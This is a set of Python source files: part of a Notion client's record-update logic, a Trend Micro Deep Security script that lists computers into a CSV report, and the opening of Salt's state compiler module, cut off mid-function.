response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
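# Illustrative sketch (standalone, not used above): the path-descent rule that
# run_local_operation applies for a "set" command, reduced to plain dicts so the
# semantics are easy to see. The record data below is hypothetical.
def _example_local_set_operation():
    record = {"properties": {"title": [["Old title"]]}}
    path, args = ["properties", "title"], [["New title"]]
    ref = record
    while len(path) > 1:                  # for "set", stop with one path key left
        ref = ref.setdefault(path.pop(0), {})
    ref[path[0]] = args                   # the remaining key receives the args
    return record                         # {"properties": {"title": [["New title"]]}}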
|
listComputersParallelExpands.py
|
import deepsecurity as api
from deepsecurity.rest import ApiException as api_exception
from deepsecurity.expand import Expand
from threading import Thread
from threading import Lock
import copy
import codecs
import re
import time
import pickle
import os
import datetime
# DSM Host & port (must end in /api)
HOST = 'https://app.deepsecurity.trendmicro.com:443/api'
# API Key from the DSM defined in an environment variable called "API_KEY"
API_KEY = os.environ.get('API_KEY', None)
# Output file
FILENAME = 'report.csv'
# API Version
api_version = 'v1'
class DeepSecurityComputers:
def __init__(self, config):
self._lock = Lock()
self._threadDataLock = Lock()
self._threadsGroups = []
self._threadCount = 12
self._Groups = None
self._Computers = []
self._config = config
def GetAllGroups(self, configuration):
# Set search criteria
search_criteria = api.SearchCriteria()
search_criteria.id_value = 0
search_criteria.id_test = "greater-than"
# Create a search filter with maximum returned items
page_size = 5000
search_filter = api.SearchFilter()
search_filter.max_items = page_size
search_filter.search_criteria = [search_criteria]
groupsapi = api.ComputerGroupsApi(api.ApiClient(configuration))
paged_groups = []
try:
while True:
t0 = time.time()
groups = groupsapi.search_computer_groups(api_version, search_filter=search_filter)
t1 = time.time()
num_found = len(groups.computer_groups)
if num_found == 0:
print("No groups found.")
break
paged_groups.extend(groups.computer_groups)
# Get the ID of the last group in the page and return it with the number of groups on the page
last_id = groups.computer_groups[-1].id
search_criteria.id_value = last_id
print("Last ID: " + str(last_id), "Groups found: " + str(num_found))
print ("Return rate: {0} groups/sec".format(num_found / (t1 - t0)))
if num_found != page_size:
print ("Num_found {0} - Page size is {1}".format(num_found, page_size))
except api_exception as e:
return "Exception: " + str(e)
return paged_groups
def _GetGroupComputers(self, configuration, groupID):
# Set search group criteria
search_group_criteria = api.SearchCriteria()
search_group_criteria.field_name = "groupID"
if groupID:
search_group_criteria.numeric_value = groupID
search_group_criteria.numeric_test = "equal"
else:
search_group_criteria.null_test = True
# Set search criteria
search_criteria = api.SearchCriteria()
search_criteria.id_value = 0
search_criteria.id_test = "greater-than"
# Create a search filter with maximum returned items
page_size = 250
search_filter = api.SearchFilter()
search_filter.max_items = page_size
search_filter.search_criteria = [search_criteria, search_group_criteria]
# Perform the search and do work on the results
computers_api = api.ComputersApi(api.ApiClient(configuration))
paged_computers = []
while True:
try:
expand = Expand(Expand.ec2_virtual_machine_summary)
t0 = time.time()
computers = computers_api.search_computers(api_version, search_filter=search_filter, expand=expand.list())
t1 = time.time()
num_found = len(computers.computers)
current_paged_computers = []
if num_found == 0:
#This gets noise with so many threads
#print("No computers found.")
break
for computer in computers.computers:
current_paged_computers.append(computer)
paged_computers.append(current_paged_computers)
# Get the ID of the last computer in the page and return it with the number of computers on the page
last_id = computers.computers[-1].id
search_criteria.id_value = last_id
print("Last ID: " + str(last_id), "Computers found: " + str(num_found))
print ("Return rate: {0} hosts/sec".format(num_found / (t1 - t0)))
if num_found != page_size:
print ("Num_found {0} - Page size is {1}".format(num_found, page_size))
except api_exception as e:
print ("Exception: {0}".format(str(e)))
return paged_computers
def _computers_tread(self, configuration, groupID):
computersReturn = self._GetGroupComputers(configuration=configuration, groupID=groupID)
self._lock.acquire()
self._Computers.extend(computersReturn)
self._lock.release()
def _computers_tread_array(self, configuration, groups):
computerGroup = {}
while True:
self._threadDataLock.acquire()
if self._threadsGroups:
computerGroup = self._threadsGroups.pop()
self._threadDataLock.release()
else:
self._threadDataLock.release()
return
if computerGroup:
self._computers_tread(configuration=configuration, groupID=computerGroup.id)
else:
return
return
def GetAllComputers(self):
self._Groups = self.GetAllGroups(self._config)
return self._GetAllComputers(self._config, self._Groups)
def _GetAllComputers(self, configuration, groups):
threads = []
thread_data = {}
self._threadsGroups = copy.copy(groups)
t0 = time.time()
# this starts a thread to collect all computers that do not belong to any group
nonGroupcomputersThread = Thread(target=self._computers_tread, args=(configuration,None,))
nonGroupcomputersThread.start()
# Setup each thread
for i in range(self._threadCount):
threads.append(Thread(target=self._computers_tread_array, args=(configuration, None)))
# Start each thread
for i in range(self._threadCount):
threads[i].start()
#Wait for each thread
for i in range(self._threadCount):
threads[i].join()
        # If needed, wait for the non-group thread to finish.
nonGroupcomputersThread.join()
t1 = time.time()
# Give some total time/rate metrics.
print ("Total time {0} seconds for a rate of {1}hosts/second".format(t1-t0, len(self._Computers)/(t1-t0)))
return self._Groups,self._Computers
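# Illustrative sketch (standalone): the "ID greater-than" paging pattern used by
# GetAllGroups/_GetGroupComputers above, reduced to a generic helper. `fetch_page`
# is a hypothetical callable returning objects with an `.id` attribute for id > last_id.
def _example_paginate_by_id(fetch_page, page_size=250):
    items = []
    last_id = 0
    while True:
        page = fetch_page(last_id, page_size)
        if not page:
            break
        items.extend(page)
        last_id = page[-1].id             # advance the cursor to the last ID seen
        if len(page) != page_size:        # a short page means the last page was reached
            break
    return items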
def WriteToDisk(computers, groups):
with open('computers.pkl', 'wb') as outfile:
pickle.dump(computers, outfile)
with open('rest_groups.pkl', 'wb') as outfile:
pickle.dump(groups, outfile)
return
def ReadFromDisk():
with open('rest_groups.pkl', 'rb') as infile:
_Groups = pickle.load(infile)
with open('computers.pkl', 'rb') as infile:
_RestComputers = pickle.load(infile)
return _Groups, _RestComputers
def ConvertToHostLight(value):
if value == "active":
return "Managed"
if value == "warning":
return "Warning"
if value == "error":
return "Critical"
if value == "inactive":
return "Unmanaged"
if value == "not-supported":
return "Unmanaged"
return "Unmanaged"
def _getAmazonAccount(groupid, groups, _awsAccounts, _accountPattern):
if groupid in _awsAccounts:
return _awsAccounts[groupid]
for g in groups:
if g.id == groupid:
            if g.parent_group_id is not None:
                cloudAccount = _getAmazonAccount(g.parent_group_id, groups, _awsAccounts, _accountPattern)
                _awsAccounts[g.id] = cloudAccount
                return cloudAccount
            if g.id in _awsAccounts:
                return _awsAccounts[g.id]
_awsAccounts[g.id] = g.name
return g.name
return '0'
def _convertTimeStamp(serverTime):
if serverTime:
t = datetime.datetime.fromtimestamp(serverTime / 1000).strftime('%Y-%m-%dT%H:%M:%S.%fZ')
return t
return " "
def WriteCSV(pagedcomputers, groups):
_awsAccounts = {}
_accountPattern = re.compile("[0-9]{6,25}")
with codecs.open(FILENAME, "w", "utf-8") as outfile:
outfile.write(
"AWS Instance Id,Computer Status,Status,amazon_account_id,displayName,host_name, Agent Version, Last Agent Communication\n")
for computers in pagedcomputers:
for restComputer in computers:
try:
account = _getAmazonAccount(restComputer.group_id,groups, _awsAccounts, _accountPattern)
statusMessage = "{0}".format(restComputer.computer_status.agent_status_messages)
statusMessage = statusMessage.replace(","," ")
if restComputer.ec2_virtual_machine_summary:
instanceid = restComputer.ec2_virtual_machine_summary.instance_id
if instanceid is None:
instanceid = "None"
else:
instanceid = "None"
outfile.write("{0},{1},{2},{3},{4},{5}, {6}, {7}\n".format(
instanceid,
ConvertToHostLight(restComputer.computer_status.agent_status),
statusMessage,
account,
restComputer.display_name,
restComputer.host_name,
restComputer.agent_version,
_convertTimeStamp(restComputer.last_agent_communication)
))
except Exception as err:
print (err)
return
if __name__ == '__main__':
if not API_KEY:
        raise ValueError('You must set the "API_KEY" environment variable')
# Add Deep Security Manager host information to the api client configuration
configuration = api.Configuration()
configuration.host = HOST
configuration.verify_ssl = True
# Authentication
configuration.api_key['api-secret-key'] = API_KEY
dsComputers = DeepSecurityComputers(configuration)
groups,allComputers = dsComputers.GetAllComputers()
WriteToDisk(allComputers, groups)
# groups,allComputers = ReadFromDisk()
WriteCSV(allComputers, groups)
print "finished"
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
      'name': '<the name argument passed to all states>',
'argn': '<arbitrary argument, can have many of these>'
}
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
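# Illustrative example (hypothetical data): trim_req drops the function part of a
# requisite reference, e.g. trim_req({"file.managed": "/etc/motd"}) -> {"file": "/etc/motd"}.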
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
    Scan high data for the ID referencing the given name and return a list of (ID, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
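# Illustrative sketch (hypothetical high data): how find_name resolves a requisite
# name to the ID that declares it.
def _example_find_name():
    high = {
        "vim": {"__sls__": "editors", "pkg": [{"name": "vim-enhanced"}, "installed"]},
    }
    return find_name("vim-enhanced", "pkg", high)   # [("vim", "pkg")]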
def find_sls_ids(sls, high):
"""
    Scan for all IDs in the given SLS and return them as a list of (ID, state) tuples
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
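# Illustrative sketch (hypothetical call data): mock_ret only needs the bound
# "args"/"kwargs" produced for the state call.
def _example_mock_ret():
    return mock_ret({"args": [], "kwargs": {"name": "/etc/motd"}})
    # -> {"name": "/etc/motd", "comment": "Not called, mocked", "changes": {}, "result": True}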
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # Is this a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
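    # Illustrative example of pad_funcs (hypothetical data): a short declaration such
    # as {"/etc/motd": "file.managed"} is padded into {"/etc/motd": {"file": ["managed"]}},
    # and a dotted key like {"file.managed": [...]} becomes {"file": [..., "managed"]}.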
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
            # There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
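# Illustrative sketch (hypothetical chunks): how order_chunks resolves the "order"
# option. Empty opts/renderers are enough here because order_chunks does not use them.
def _example_order_chunks():
    chunks = [
        {"state": "pkg", "name": "vim", "fun": "installed", "order": "last"},
        {"state": "file", "name": "/etc/motd", "fun": "managed", "order": 1},
        {"state": "user", "name": "deploy", "fun": "present"},   # no explicit order
    ]
    ordered = Compiler({}, {}).order_chunks(chunks)
    return [c["name"] for c in ordered]   # ["/etc/motd", "deploy", "vim"]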
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
        Check that onlyif returns a 0 (the state runs only if it does).
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
